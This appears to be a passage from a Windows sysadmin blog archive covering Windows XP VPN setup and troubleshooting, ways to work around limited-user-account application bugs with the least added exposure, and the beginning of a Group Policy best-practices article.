3. After your computer connects to the Internet, the VPN server prompts you for your user name and password. Type your user name and password, and then click Connect. Your network resources should be available to you in just like they are when you connect directly to the network.
4. To disconnect from the VPN, right-click the icon for the connection, and then click Disconnect.
Note If you cannot connect to shared resources on the remote network by computer, you can use the remote computer's IP address to connect by using UNC (\\\Share_name). Edit the hosts file in the Windows\System32\Drivers\ folder, and add an entry to map the remote server's name to its IP address. Then use the computer name in a UNC connection (\\Server_name\Share_name).
Back to the top

Troubleshoot VPN connections
Troubleshooting VPN connection issues typically involves contacting your Internet service provider (ISP), your VPN server administrator, or your router or firewall manufacturer.

When you try to connect to your VPN server, you may not be able to connect, and you may receive one of the following error messages:
678: The remote computer did not respond.

930: The authentication server did not respond to authentication requests in a timely fashion.

800: Unable to establish the VPN connection.

623: The system could not find the phone book entry for this connection.

720: A connection to the remote computer could not be established.
To resolve this issue, use one of the following methods: • Verify that you have connected to the Internet before you try to connect to the VPN server.

For more information about troubleshooting Internet Connectivity in Windows XP, click the following article numbers to view the articles in the Microsoft Knowledge Base:
314067 (http://support.microsoft.com/kb/314067/) How to troubleshoot TCP/IP connectivity with Windows XP
314095 (http://support.microsoft.com/kb/314095/) How to troubleshoot possible causes of Internet connection problems
• If you can connect to the Internet but you still cannot establish a connection to the VPN server, and you receive error 623, see the following Microsoft Knowledge Base article:
227391 (http://support.microsoft.com/kb/227391/) Error message: "Error 623 the system could not find the phone book entry for this connection" when making a VPN connection
• If you can connect to the Internet but you still cannot establish a connection to the VPN server, and you receive error 720, see the following Microsoft Knowledge Base article:
314869 (http://support.microsoft.com/kb/314869/) Error 720: No PPP control protocols configured
• If you still cannot connect to the VPN server, the VPN server may not be configured correctly. Contact your VPN server administrator.

If you are the VPN server administrator, see the following Microsoft Knowledge Base articles for additional information about how to configure a Microsoft VPN server:
308208 (http://support.microsoft.com/kb/308208/) How to install and configure a virtual private network server in Windows 2000
162847 (http://support.microsoft.com/kb/162847/) Troubleshooting PPTP connectivity issues in Windows NT 4.0
299684 (http://support.microsoft.com/kb/299684/) Error message: Error 930; The authentication server did not respond to authentication requests in a timely fashion
• If you use a personal firewall or a broadband router, or if there are routers or firewalls between the VPN client and the VPN server, the following ports and protocol must be enabled for PPTP on all firewalls and routers that are between the VPN client and the VPN server:

Client ports Server port Protocol
1024-65535/TCP 1723/TCP PPTP

Additionally, you must enable IP PROTOCOL 47 (GRE).

For information about your firewall or router configuration, and to confirm that your firewall or your router will pass these ports and protocol, contact the manufacturer of your firewall, your router, your ISP, or your VPN server administrator.

Back to the top

Configuring a free VPN in home with Windows XP

2006-11-21T20:55:00.001-08:00

I've had numerous members here email me about writing an article on setting up a secure, inexpensive, home VPN solution that they could use to share files between their home and office computers while they were at work. After speaking with many different people on the subject, I decided that most of them were running Windows XP for their operating systems and Linksys brand routers. That being said the following article is based on the above specifications and will involve no extra cost in setting up the VPN connection.

VPNs or Virtual Private Networks continue to increase in popularity due to the rise of inexpensive, high capacity Internet connectivity. Therefore lots of people are now using secure VPNs in order to connect to their home based networks as well as their office networks. If you have stumbled across this article and do not know the meaning of the term VPN it would be as follows:

A VPN is used to connect multiple private networks securely across an unsecured public network like the Internet. A private network in this case would be a network in which the traffic is not freely accessible by the public. If we break down the meaning of Virtual Private Network in the instance explained above it would be as follows. The two end points of this "network" are private networks that are seamlessly connected across a public network in which neither private network knows about, creating a "Virtual Private Network" between them.

For more information on what VPNs are you can read this article I wrote on the subject as an overview of the technology:

http://www.computernetworkinghelp.com/content/view/37/2/

Microsoft has built in the ability to act as a VPN termination point right into Windows XP. Microsoft XP allows one connection to come in over the configured VPN via the PPTP protocol, using MPPE 128-bit encryption and Microsoft CHAP v2 authentication. It's fairly easy to configure and can run on your existing LAN connection of your home computer. Below I will walk you through the steps of configuring the VPN server, allowing the protocol to pass through your Linksys router and finally how to configure your client to connect to the VPN.

Section 1: Configuring the VPN server (PC that VPN clients will connect to).
Step 1: First we need to click on the "start" menu and then click on "control panel", you will see a screen similar to the one in the image below in Figure 1-A.
Figure 1-A

Step 2: Next we will need to click on "Network and Internet Connections" as shown outlined in red in Figure 1-A above. Next you should see a screen similar to the one in the image below in Figure 1-B.
Figure 1-B

Step 3: Next we will need to click on "Network Connections" as shown outlined in red in Figure 1-B above. Next you should see a screen similar to the one in the image below in Figure 1-C.
Figure 1-C

Step 4: On this screen you will see the currently configured network connections to the right and then a menu on the left. Don't worry if the connections on the right don't look exactly like the ones in Figure 1-C. Next we will need to click on "Create a new connection" to the left, in the "Network Tasks" section as shown outlined in red in Figure 1-C above. Next you should see a screen similar to the one in the image below in Figure 1-D.
Figure 1-D

Step 5: You have now opened up the "New Connection Wizard", we will use this again later in Section 2 to configure the VPN client as well. This screen is purely informational, we will just need to click on the next button as shown outlined in red in Figure 1-D above. Next you should see a screen similar to the one in the image below in Figure 1-E.
Figure 1-E

Step 6: Now we will need to click on the radio button next to "Set up an advanced connection" as shown outlined in red in Figure 1-E above and then click the next button once that has been selected. Next you should see a screen similar to the one in the image below in Figure 1-F.
Figure 1-F

Step 7: Now we will need to click on the radio button next to "Allow incoming connections" as shown outlined in red in Figure 1-F above and then click the next button once that has been selected. Next you should see a screen similar to the one in the image below in Figure 1-G.
Figure 1-G

Step 8: Notice that there is a device listed in Figure 1-G. If your list of connection devices is different don't worry about it. In this scenario we won't be selecting a device here because we are not using a device terminate our incoming connections but if you were using a modem for example, you would select it here. Now you will want to just click the next button as shown outlined in red in Figure 1-G above. Next you should see a screen similar to the one in the image below in Figure 1-H.
Figure 1-H

Step 9: Now we will need to click on the radio button next to "Allow virtual private connections" as shown outlined in red in Figure 1-H above and then click the next button once that has been selected. Next you should see a screen similar to the one in the image below in Figure 1-I.
Figure 1-I

Step 10: This is the User Permissions screen in figure 1-I above. Here you will see a list of currently configured users on this system. In this case for simplicity, I have clicked on the box next to "VPN User" which I had already configured on my system previously. Notice how the box in the picture now has a checkmark located in it indicating that it has been selected. Now in this case you could just use your standard user ID on your system or you could click on the "add" button first to create a new ID for the VPN connection (NOTE: Should always be a password protected account!). Now we will need to click on the next button to continue. Next you should see a screen similar to the one in the image below in Figure 1-J.
Figure 1-J

Step 11: This is the Networking Software screen in figure 1-J above. Here you will see a list of currently available networking software on this system. In this case we will want to click the box next to "File and Printer Sharing for Microsoft Networks" as outlined in red in Figure 1-J above. The boxes next to boxes next to "Internet Protocol (TCP/IP)", "Client for Microsoft Networks" should already be checked, If not, click them as well. Now we will need to click on the next button to continue and we're almost done. Next you should see a screen similar to the one in the image below in Figure 1-K.
Figure 1-K

Step 12: You now see the "Completing New Connection Wizard" dialog. This screen is purely informational also, we will just need to click on the finish button as shown outlined in red in Figure 1-K above and you are done. Next you should be back to your "Network Connections" screen similar to the one in the image below in Figure 1-L.
Figure 1-L

Step 13: Note: Now on the Network Connections screen in Figure 1-L above you have a new section called "Incoming" and a new connection called "Incoming Connections" below that. You can come here to view connections to the VPN. There are also additional properties that can be changed there but that's out of the scope of this document. At this time Section 1: Configuring the VPN Server is completed.

Step 1: First we need to enable PPTP pass through on a screen similar to the one in the image below in Figure 2-A.
Figure 2-A

NOTE: I'm not going into a lot of detail here because there are so many different routers and so many different versions of firmware. This specific explaination is for a Linksys model router, not all Linksys model routers will look the same depending on the version of firmware as well. PPTP uses TCP over port 1723, this type of VPN also requires GRE (Generic Routing Encapsulation) for the data stream. The NAT engine in the router must have support for GRE in order for this to function properly but most newer routers won't have a problem with this.

Step 2: Now we need to enable PPTP port fowarding on a screen similar to the one in the image below in Figure 2-B.
Figure 2-B

NOTE: The IP address needs to be the address of the PC that you configured the VPN server on. Its a good idea to have statically defined addresses on devices that perform specific functions like a VPN server.

Step 3 (Optional): If you are running windows firewall on the VPN server interface you will need to allow PPTP (TCP Port 1723) to pass through. You can do this by going to "Add Port" under the "Exceptions" tab in the Windows Firewall configuration similar to the screen in Figure 3-B below. You can name it PPTP, put in 1723 in the "Port Number" field and select the TCP radio button and then select OK. You should see PPTP checked in the Programs and Services list afterwards.

Figure 2-C

NOTE: You will need to make sure that "Don't allow exceptions" is NOT checked on the General tab of the Windows Firewall configuration screen.
Step 1: First we need to click on the "start" menu and then click on "control panel", you will see a screen similar to the one in the image below in Figure 3-A.
Figure 3-A

Step 2: Next we will need to click on "Network and Internet Connections" as shown outlined in red in Figure 3-A above. Next you should see a screen similar to the one in the image below in Figure 3-B.
Figure 3-B

Step 3: Next we will need to click on "Network Connections" as shown outlined in red in Figure 3-B above. Next you should see a screen similar to the one in the image below in Figure 3-C.
Figure 3-C

Step 4: On this screen you will see the currently configured network connections to the right and then a menu on the left. Don't worry if the connections on the right don't look exactly like the ones in Figure 3-C. Next we will need to click on "Create a new connection" to the left, in the "Network Tasks" section as shown outlined in red in Figure 3-C above. Next you should see a screen similar to the one in the image below in Figure 3-D.
Figure 3-D

Step 5: You have now opened up the "New Connection Wizard", if you remember we used this in section 1 to create the VPN server connection. This screen is purely informational, we will just need to click on the next button as shown outlined in red in Figure 3-D above. Next you should see a screen similar to the one in the image below in Figure 3-E.
Figure 3-E

Step 6: Now we will need to click on the radio button next to "Connect to the network at my workplace" as shown outlined in red in Figure 3-E above and then click the next button once that has been selected. Next you should see a screen similar to the one in the image below in Figure 3-F.
Figure 3-F

Step 7: Now we will need to click on the radio button next to "Virtual Private Connection" as shown outlined in red in Figure 3-F above and then click the next button once that has been selected. Next you should see a screen similar to the one in the image below in Figure 3-G.
Figure 3-G

Step 8: Now we will need to name this VPN connection by typing in the "Company Name" field as shown in Figure 3-G above. In this instance I just used the name "VPN Connection" but you can use anything you wish. Once you've named the connection click the next button. Next you should see a screen similar to the one in the image below in Figure 3-H.
Figure 3-H

Step 9: Now we will need to specify the public IP address (reachable from the Internet) by typing in the "Host name or IP address" field as shown in Figure 3-H above. In this instance I just used the IP Address "10.1.1.1" which is simply made up for this tutorial. In your case this will need to be the public IP address that is assigned from your Internet Service Provider (ISP) and will be assigned to the public interface of your router if you have one or the Internet interface of your PC (VPN Server) if you don't use a router. Sometimes this address can change if your provider gives you a dynamic IP address and will need to be change in the client when/if this happens. This information should be in the documentation that you received from your ISP or can be retrieved from your PC or router. Once you've assigned an IP address to the connection click the next button. Next you should see a screen similar to the one in the image below in Figure 3-I.

Figure 3-I

Step 10: You now see the "Completing New Connection Wizard" dialog. You will want to click on the box next to "Add a shortcut to this connection to my desktop" and then it should have a check mark in the box. Now we will just need to click on the finish button as shown outlined in red in Figure 3-I above and you are done.
Step 11: Now on your desktop you should have an icon called "VPN Connection", double click on that icon and you will see a login screen similar to the one in Figure 3-J below.
NOTE: Replace VPN Connection above with whatever you named the VPN connection in Step 8 of Section 3.

Figure 3-J

Type in the login name and password of the user that you assigned to the VPN server connection in Step 10 of Section 1 and click on the connect button. Provided you had the proper equipment and followed the instructions above you should be able to connect to the VPN and access shares securely that you have made available to the VPN user that you created or assigned in this tutorial.

If you get an error message you can refer to the "Troubleshoot VPN Connections" section in this microsoft document.

http://support.microsoft.com/default.aspx?scid=kb;en-us;314076

Well, I hope you've enjoyed this article on configuring a free home VPN solution, see you next time.

Fixing LUA(Limited User Account) bugs

2006-11-21T20:53:00.002-08:00

First, what is "LUA"?

"LUA" is an acronym that variously refers to "Limited User Account", "Least-privileged User Account", "Least User Access", and probably several other clumsy phrases that ultimately indicate a computer user account that cannot make changes that affect other users of the system or the operating system itself. In Windows, these are typically members of the built-in "Users" group; they are explicitly not members of powerful groups such as "Administrators", Power Users", or "Backup Operators", and do not hold elevated privileges such as "Load and unload device drivers," "Take ownership of files or other objects," or "Act as part of the operating system".

A "LUA bug," then, refers to an application -- or a feature of an application -- that works correctly when run with elevated privileges but fails to work for a LUA user, and where there is no technical or business reason for requiring elevated privileges. A common example is when an application saves its runtime settings to a registry key under HKEY_LOCAL_MACHINE (which is read-only to LUA users), instead of to HKEY_CURRENT_USER.

Windows doesn't allow LUA users to change the system time. That is not a LUA bug, because changing the system time has security implications with respect to auditing and to the Kerberos protocol. The fact that Windows XP doesn't allow LUA users to change the time zone is arguably a LUA bug, as is the fact that double-clicking the clock in the taskbar's notification area gives you an error message instead of a read-only view of the Date&Time applet. (Note 1: Vista is heavily focused on a more seamless LUA experience -- see the UAC blog for more info -- and the Date&Time applet is a primary target for an upgraded experience. Note 2: I wrote an earlier post about how to grant a Windows XP user the ability to change the date, time and/or time zone.)

By far, the majority of LUA bugs are due to registry and file system access. A program might try to save its settings into its installation folder under %ProgramFiles%, or it might try to open a key under HKLM for "All-Access" even if it only ever needs Read access. However, there are other types of LUA bugs: attempting to start or stop a service, load a device driver, access hardware resources directly, create or manage file shares, or even explicitly check whether the current user is a member of the Administrators group.

At the core, there are always one or more low-level operations ("API calls") that succeed when performed as admin but that fail when performed as LUA. You can see some of these yourself using tools such as SysInternals' Regmon and Filemon. However, is every one of these a real LUA bug? The answer is that it depends on how the application responds to the failure. The responses I have seen can be categorized in one of three ways:

"Fire and forget": The application invokes the operation, doesn't check the result, but doesn't depend on the operation having succeeded in order to continue working correctly. This is not a LUA bug.

"Gracefully degrade": The application invokes the operation, checks whether it succeeded, and handles failure in an appropriate way. This is not a LUA bug.

"True LUA bug": The application invokes the operation, assumes it succeeded, and depends on the operation having succeeded in order to continue working correctly. A variation on this is that the app checks whether the operation succeeded, but handles the failure inappropriately, such as by displaying an error message and falling over dead.
If you've ever monitored a GUI app running as LUA with Regmon, you've probably come across an example that could be categorized as fire-and-forget: a failed attempt to open HKLM \ System \ CurrentControlSet \ Control \ MediaProperties \ PrivateProperties \ Joystick \ Winmm for All-Access. This occurs during initialization of the joystick subsystem for the process. The specific operation fails, but it does not impact the correct behavior of your application. However, I have seen "guidance" on the web (no doubt from people misinterpreting Regmon output) claiming that to fix some particular application you need to grant the user full access to this key. No! It's not a true LUA bug. You should never need to change permissions on this key!

Before you go making wholesale changes to security settings, you should verify that you're remediating a true LUA bug and not just a phantom, and that there aren't better ways that don't increase exposure. More on that in upcoming posts.

You have an application that you – or your users – need to run. It’s a normal app – it isn’t designed to perform system administration of your computer, but for some reason, it doesn’t work correctly unless it’s run from an account that has administrator-level access (see “What is a "LUA Bug"? (And what isn't a LUA bug?)”. But you don’t want your users running as admin. What to do?

The “workaround” most frequently chosen is simply to add the user to the Administrators group. Sometimes this approach is not decided by the IT department, but by some “helpful” HelpDesk technician: “Let’s see whether this fixes the problem.” The technician forgets to remove you from the Admins group, inevitably leading to another HelpDesk call within a few weeks: “HelpDesk, why is my computer running so slowly, and why are all these porn ads popping up whenever I log on?” (Answer: Because you’ve been running as admin!) Let’s just call this “workaround” a non-starter and not give it any further consideration.

Other common but sub-optimal workarounds are: 1) run the one program as administrator, or 2) run the program as a regular user, but after granting Everyone “Full Control” over the program’s installation folder and all of its registry keys under HKEY_LOCAL_MACHINE, and to all of HKEY_CLASSES_ROOT. Oh, and while we’re at it, grant the user the “Debug”, “Take ownership” and “Act as part of the operating system” privileges. These are seriously high-risk ways to get the program to run, and should be avoided.

So what do you do? In this mini-series of posts, I’ll lay out a systematic approach for working around LUA bugs that minimizes exposure. I’ll discuss approaches from most-preferred to least-preferred, with some of the pros and cons of each. By the way, while this guidance is targeted primarily to Windows XP, it will also work on Windows Vista.

#1: It is a bug – treat it like one and make the developers fix it!

This is the most preferred approach. If there is no legitimate business or technical reason for the app to require admin privileges, then failure of the app to work for a regular user account is a serious bug that compromises system security, stability and manageability. (Note: if the development team says something like “It’s mission-critical, so it has to run as admin”, or “it writes to HKEY_LOCAL_MACHINE, so it has to run as admin”, the correct response from you is, “You’re talking nonsense. Fix the bug!”)

Benefits of this approach:

Once it is fixed this way, you don’t need to carry forward any shims, tweaks or workarounds.
Developers may learn from the experience, and stop creating new LUA bugs. (Note: Developers running as admin are the #1 cause of LUA bugs!)

There are some drawbacks, though:

The expense in time and/or money may be prohibitive, particularly if you have limited resources and a lot of apps to fix. You have to consider the possibility of the app having to be rearchitected, and the possibility of new bugs being introduced in the process.
The developers and/or the source code may not be available. It may be 3rd party code from a company that no longer exists. The developers may be in rehab. Or jail. Or working for your competitor. Or they may be working on something “more important”.

#2: Application Compatibility Toolkit

Use the LUA Mode shims of the Application Compatibility Toolkit (ACT). (File and Registry Virtualization is the equivalent solution built into Windows Vista.)

The LUA Mode shims detect attempts to write to system-wide locations in the file system and registry and silently redirect them to per-user locations.

Benefits of this approach:

It is easy to implement

Drawbacks:

The LUA Mode shims on XP often do not work (Vista’s Virtualization is a complete rewrite and will have much higher compatibility marks than XP’s ACT LUA Modes.)
The added complexity of the resulting underlying operations can make your troubleshooting more complicated when things don’t work.

The next 3 items (3a, 3b and 3c) are system changes that solve different specific issues, but share the common feature of not granting any elevated access to system-wide resources.

#3a: Copy specific HKCR keys to HKCU\Software\Classes

(Registry notations used here:

HKLM = HKEY_LOCAL_MACHINE;

HKCR = HKEY_CLASSES_ROOT;

HKCU = HKEY_CURRENT_USER)

Some background: Prior to Windows 2000, HKCR was just a symbolic link to HKLM\Software\Classes, which only Administrators can write to. In other words, operations performed on HKCR\.txt would actually occur in HKLM\Software\Classes\.txt. Windows 2000 introduced per-user registration data, so now HKCR is a merged view of HKLM\Software\Classes and HKCU\Software\Classes (which the user can write to). If a key exists in the latter, it takes precedence. So now an operation on HKCR\.txt will occur in HKCU\Software\Classes\.txt if that key already exists, otherwise it will occur in HKLM\Software\Classes\.txt as it had in the past.

The issue to fix: A number of applications write to HKCR at runtime to “reinforce” their file associations, COM registration data, etc., and raise an error if the write fails, even if the data they want to write is already there. The same data is written every time the app runs. If that same registration data were stored in HKCU\Software\Classes, then the write operations would succeed, without changing program behavior.

How to fix it: First you must identify the keys under HKCR that the application is trying to write to. (How to do that will be covered in later posts.) Export those keys to one or more .reg files (in Regedit, use File/Export, Selected branch). Using a text editor, replace all instances of

[HKEY_CLASSES_ROOT\

with

[HKEY_CURRENT_USER\Software\Classes\

and save your changes. Import the edited .reg file into the registry of the user who needs to run the program.

Benefits of this approach:

This fixes issues where applications perform operations in HKCR that should have been done only during installation.
This approach is better than loosening access control on system-wide resources under HKCR (HKLM). Malware overwriting keys under HKCU will not affect operating system components or other users of the computer.

Drawbacks:

It is not easy, with today’s tools, to identify HKCR writes as the source of LUA bugs, and exactly which keys are involved. (More on this in upcoming posts.)

#3b: IniFileMapping

Background:

Back in the days of Windows 3.x, before there was the Registry that we know and love, the OS and applications stored configuration and preference data to .ini (initialization) files, such as win.ini. Windows did and still does offer API-level support for .ini files via the “Profile” APIs (e.g., WritePrivateProfileString). Many apps (including some Windows applets) still use these APIs to try to write to .ini-formatted files, often in folders where Users are not supposed to write.

Windows NT 3.1 encouraged the migration from .ini files to the more scalable and manageable Registry, and provided a means for automatically redirecting .ini file reads and writes to registry keys. The internal implementation of the “Profile” APIs was augmented to use mappings found under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\. If a mapping for a .ini file is not found under that key, then the operation is performed in the file system as before.

The issue to fix: If access to an .ini-formatted file – via the “Profile” APIs – is the cause of a LUA bug, it can be remediated by adding a key under the IniFileMapping key to redirect access to HKCU. Note that IniFileMapping is under HKLM and requires administrative privileges to configure. The config specifics are described in the documentation for the “Profile” APIs, such as WritePrivateProfileString.

Benefits of this approach:

This approach is better than loosening access control on system-wide resources in the file system. Malware overwriting keys under HKCU will not affect operating system components or other users of the computer.

Drawbacks:

It is not easy, with today’s tools, to identify .ini-file access as the source of LUA bugs. (More on this in upcoming posts.)

#3c: SafeDisc

A number of games depend on the “secdrv” device driver, also known as “SafeDisc”, from Macrovision. The secdrv driver that ships with Windows XP is a demand-start driver, which users are not allowed to stop and start, resulting in errors when accessed by programs. There is an update, available from Microsoft and from Macrovision that configures the driver to be loaded when the system starts so that the user does not need to start it. This change allows some games to work correctly for a non-admin user.

(Note that as of this writing, the Microsoft download page for this update says that “[t]his software will not alter or patch any component on your system, it will only change the startup state of the system component…” This is actually not true – it installs an updated driver.)

Benefits: Easy to implement, and no ACL changes to systemwide resources.

Drawbacks: None, really.

Coming up in Part 2:

#4: Loosening specific ACLs, and

#5: Running the one app as admin

#4: Loosen ACLs

The usual reason for LUA bugs is that the developers (and often, the testers) always ran as admin. They didn’t explicitly set out to require that the end-user run as admin, but things crept into the code that depended on admin access, such as writing to files in the root folder of the C: drive, in the app’s installation folder under %ProgramFiles%, or in %windir%. The app worked correctly until you ran it on your machine as a regular User. The app wasn’t designed to handle that scenario gracefully, and barfed. (See What is a LUA Bug…).

Option #4 is to change the Access Control List (ACL) on objects to grant your User the access that the program requires. Typically the objects that need tweaking will be in the registry or in the file system (if using NTFS). This must be done very carefully, though, and only after all of the more-preferred options have failed.

Constraints:

App-specific resources only: ACL changes should only ever be considered on application-specific resources, not on OS-wide resources. While it might be OK to change the ACL on %ProgramFiles%\VendorX\AppX\DataFolder, you should never change the ACL on %SystemRoot%\System32 – to loosen or to tighten access. (See KB article 885409 for more information.)

Not used by admins: Avoid changing ACLs on resources – particularly executables such as .exe and .dll files – that are ever used by administrators or services. Doing so increases the risk of elevation of privilege leading to compromise of the entire system. (Even so, the attack surface would remain far smaller than it would be with everything always running as admin.)

Avoid binaries: Avoid changing ACLs on program code (e.g., exe, dll, or ocx files) if at all possible, to prevent malware from infecting or replacing them.

Single non-admin user (ideal): Ideally, the resource should be one that is only ever accessed by a single non-admin user. If the resource is accessed by multiple non-admin users, there is increased risk of one user causing another user’s account to be compromised. As described above, if it is ever used by an admin user or a service, risks are increased further.

Least additional privilege: You should grant the least amount of additional access to the smallest possible number of resources and to the smallest possible number of users in order to allow the app to work. Granting Full Control to Everyone on a big chunk of the file system or registry should never be necessary.

Granting the additional access only to the computer’s primary user is optimal, but that may be difficult to manage across a large number of systems when each computer has a different primary user (e.g., grant MARY the permissions on one system, STEVE on another, etc). If you can define a set of users who need to use the program, add them to a group and grant the access to that group.

Another alternative to consider is to grant access to the built-in INTERACTIVE pseudo-group. This will grant the additional access only to whoever is interactively logged on at the time, without also granting any additional remote access to the resource. Note that in a terminal server or Fast User Switching scenario there can be multiple simultaneous users on the computer with INTERACTIVE in their tokens.

Benefits of this approach:

Big return on the investment of your time – most of the LUA bugs that my colleagues and I have seen revolve around file and registry permissions. This approach will probably fix a larger share of your LUA bugs than any other approach.

Drawbacks to this approach:

It’s #4 on the list for a reason. This approach allows otherwise-constrained users to change shared resources – for good or evil, and makes it easier for one user (or malware unintentionally run by that user) to affect others. If the affected user is an admin, the entire system can be compromised.

As with items #3a and 3b, it is not easy, with today’s tools, to identify precisely which resources should be opened up and by how much. (More on this in upcoming posts.)

It can be difficult to know for certain whether opening access to a resource will inadvertently expose an avenue for elevation of privilege, allowing system takeover.

#5: Run the one app with elevated privileges

As a last resort, after all else fails, consider running that one app with elevated groups and/or privileges. Some apps, for example, “address” their LUA bugs by explicitly checking for admin group membership on startup and displaying an error message insisting that you simply have to be an admin to use the program. This may be due to developer laziness, incompetence or arrogance (or all three), but these apps will be resistant to any other workarounds available to you.

Typically, this approach means running the app as admin. You could instead run the app elevated but less-than-full-admin – for example, as a member of Power Users or with a specific privilege such as SeLoadDriverPrivilege. Note, though, that with a little more work many of these other groups and privileges can still be used to take over an entire system.

Benefits of this approach:

It’s better than always running everything as admin. That’s it – that is the only benefit of this approach.

Drawbacks of this approach:

Running an app with elevated privileges exposes far more risk than any of the options described earlier. It becomes very difficult to defend the system against a malicious user or malicious software when there’s an app running as admin. A simple example: Run “Notepad” as admin, then choose File/Open – that dialog is now a little Explorer-like window that gives you full, admin-level access to the entire file system, and even the ability to launch programs as admin. That can be exploited by a malicious user, or by malware pumping keystrokes or window messages into the elevated program.

How to do it:

If you trust the user with the admin password or to otherwise make security and trust decisions:

RunAs – see "RunAs" basic (and intermediate) topics and RunAs with Explorer for more information.
MakeMeAdmin – see the original post and this follow-up. MakeMeAdmin is a batch file, so you can easily customize it to run something other than a command shell. You can also customize it to make the elevated context less than full-admin.
PsExec and Process Explorer from SysInternals offer various RunAs-like options. See Mark’s blog post for more information.
RunAsAdmin, an interesting open-source utility by Valery Pryamikov, a very smart Developer Security MVP. RunAsAdmin takes an approach a little like Windows Vista’s UAC, elevating the current user in place without requiring a password.
If you don’t trust the user with the admin password:

PolicyMaker Application Security by DesktopStandard uses a Group Policy extension to configure rules for modifying process tokens. PMAS mitigates some of the drawbacks described above. For example, it can be configured so that child processes launched by a targeted app do not inherit its modified token, and can perform granular token modification, raising (or lowering) permissions, and/or adding (or removing) privileges.
Protection Manager by Winternals (the for-profit side of SysInternals) uses a lightweight client-server application and a whitelist approach to block all untrusted applications – while also allowing applications that to have their process tokens and privileges elevated to that of an Administrator or reduced to that of a User (in cases where end users are non-Administrators or Administrators, respectively). Protection Manager also doesn’t allow a child process of an elevated app to run elevated unless it is also explicitly configured as an elevated app. Conversely, all process children of reduced privilege processes are reduced automatically (to also minimize security risk). Applications can be allowed, blocked, elevated, or reduced as specified by an administrator via Digital Signatures, Hashes, NTFS File Ownership, or Path.

Trying to "hide" the admin password:

The DesktopStandard and Winternals products determine in kernel-mode code whether, when and how to modify a process token. Passwords are not used and are therefore not at risk to exposure, and the modification decision cannot be interfered with by non-admins. By contrast, there are various tools available that perform RunAs-like operations with the admin account credentials encrypted (or sometimes just obfuscated). Even though this raises the bar and will stop some users from getting the admin creds, those passwords still have to be decrypted within the user’s security context, and so are exposed to a user with the right tools.

A frequently asked question is whether the RunAs.exe /savecred option would let one create a shortcut to run a single app as admin using a saved password and not requiring further password entry. There are several issues you should be aware of:

The credentials are not tied to any one shortcut – once the creds have been saved they can be used to start any app
While the password is securely encrypted with a user-specific key, it will still be decrypted in the user’s security context and at least briefly exposed
The /savecred option is not available on XP Home Edition.

//TODO: Discuss my thoughts about the SRP/DropMyRights approach. (Bottom line: I dislike it.)

Much thanks for help and insight for this post goes to Eric Voskuil and Kevin Sullivan of DesktopStandard, and to Mark Russinovich and Wes Miller of Sysinternals/Winternals.

Best Practices for Configuring Group Policy Objects

2006-11-21T20:53:00.001-08:00

Although group policies are an extremely powerful security mechanism, it can be a bit tricky to deploy them in an effective manner. That’s because the effective group policy is made up of multiple and sometimes contradictory group policy elements that are applied to the user object and / or to the computer that the user is working from. It is therefore critically important that you manage your group policy objects in a way that will allow you to keep them well organized so that you can always figure out which policy elements apply in a given situation.

Further complicating things is the fact that group policy objects can be combined with other group policy objects from the local computer or from a number of different locations within the Active Directory. If you want to make things really interesting though, you can even throw in some loopback or non inheritance settings to make things really confusing.

My point in telling you all of this is to illustrate that without the proper planning, your group policy structure can easily become huge and overly complicated. It is therefore critically important that you manage your group policy objects in a way that will allow you to keep them well organized so that you can always figure out which policy elements apply in a given situation. In this article, I will share with you some best practices that you can use to keep your group policy objects well organized.

Disable Unused Group Policy ElementsOne of the first things that you should do to de-clutter your group policy is to disable any unused group policy elements. There are a couple of different ways that you can do this. I recommend starting out by looking at group policy objects as a whole to see if they are really necessary. In larger organizations, it is not uncommon to need group policy objects at every level of the Active Directory, but smaller organizations can often get away with having all of their group policy settings take place at a single level within the Active Directory.

The level within the Active Directory where it makes the most sense to enforce your group policy settings depends heavily on the way that the individual organization is set up. The procedure for disabling a group policy object is almost identical regardless of which level you are doing it at. For example, suppose that you wanted to disable a site level group policy object. To do so, you would open the Active Directory Sites and Services console. Next, you would right click on the site that the policy is currently linked to and select the Properties command from the resulting shortcut menu. When you do, you will see the site’s properties sheet. If you then select the properties sheet’s Group Policy tab you will see a list of all of the group policy objects that are bound to that site, as shown in Figure A.

Figure A: The Group Policy tab displays which group policy objects are bound to the site that you have selected

OK, for this example, I said that we were going to disable the site level group policy object that’s shown in Figure A. If you look at the figure, you will notice that there is a Delete button that you could use to get rid of the policy completely. However, I recommend disabling a policy initially rather than deleting it. The reason is because, if you were to delete a group policy object and then found out that something didn’t work quite right afterwards, then it might be tricky to figure out which setting caused the problem and to fix the problem. However, if you simply disable the group policy object rather than deleting it, you can always re-enable the policy should something go wrong. Of course if everything appears to work correctly after you disable the policy, you could always delete the policy once it has been disabled for a week or so.

You might notice in Figure A that there is no disable button. If you want to disable a group policy, then you will have to select the policy that you want to disable and then click the Options button. When you do, you will see the Options dialog box that’s shown in Figure B. Now all you have to do is to select the Disabled check box and click OK.

Figure B: Select the Disabled check box and click OK

So far I have shown you how to disable an entire group policy object, but what you might not realize is that you can also disable part of a group policy object. Let’s pretend that our site level group policy shown in Figure A contains some important settings at the user level, but that it doesn’t have any computer level settings configured. That being the case, we can (and should) disable the computer settings within the policy.

Technically speaking if none of the computer level settings in the policy are configured, then it isn’t hurting anything if we leave the computer level portion of the policy enabled. However, it will increase efficiency if you go ahead and disable the computer level portion of the policy. Think about what happens when a user logs on to a domain. Windows combines all of the group policy objects that apply to the user and to the computer that the user is working from and uses these group policy objects to create the effective policy. The more group policy objects that are in effect, the longer the login process will take. If however, you disable unused portions of your group policy objects, you can speed up the login process for your users and reduce the workload on your domain controllers.

So let’s pretend that we want to disable the computer level portion of the group policy object that’s shown in Figure A. To do so, we would simply click the Properties button to access the properties sheet that’s shown in Figure C. As you can see in the figure, the properties sheet contains two check boxes that you can use to disable either the user or the computer portion of the policy. Therefore, you would select the Disable Computer Configuration Settings check box and click OK.

Figure C: Select the Disable Computer Configuration Settings check box and click OK

Override SettingsNow that I have talked about how to disable whole or partial policies, I want to discuss another best practice for group policy configuration. You might have noticed in Figure B that there was a check box labeled No Override. This is one option that I recommend using very sparingly.

As I have explained already, group policies are applied in a hierarchical fashion beginning at the local computer level then working up to the domain, site, and organizational unit levels. If a setting within a higher level policy contradicts a setting made in a lower level policy, then the higher level policy takes precedence. For example, suppose that a local computer level policy set the minimum password length to six characters and a domain level policy set the minimum password length to eight characters. Assuming that both policies were in effect, the required password length would be eight characters because the domain level policy is considered to be a higher level policy than the local policy.

